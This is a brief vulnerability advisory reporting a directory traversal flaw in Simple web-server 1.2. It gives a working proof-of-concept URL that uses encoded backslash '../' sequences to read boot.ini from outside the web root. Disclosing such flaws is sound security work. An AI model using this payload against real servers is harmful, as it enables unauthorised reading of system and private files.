------------------------------------------------------------------------ Software................Simple web-server 1.2 Vulnerability...........Directory Traversal Threat Level............Serious (3/5) Download................http://www.storecalc.com Discovery Date..........6/1/2011 Tested On...............Windows XP SP3 EN ------------------------------------------------------------------------ Author..................AutoSec Tools Site....................http://www.autosectools.com/ Email...................John Leitch <john@autosectools.com> ------------------------------------------------------------------------ --Description-- A directory traversal vulnerability in Simple web-server 1.2 can be exploited to read files outside of the web root. --PoC-- http://localhost/%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../%5c../boot.ini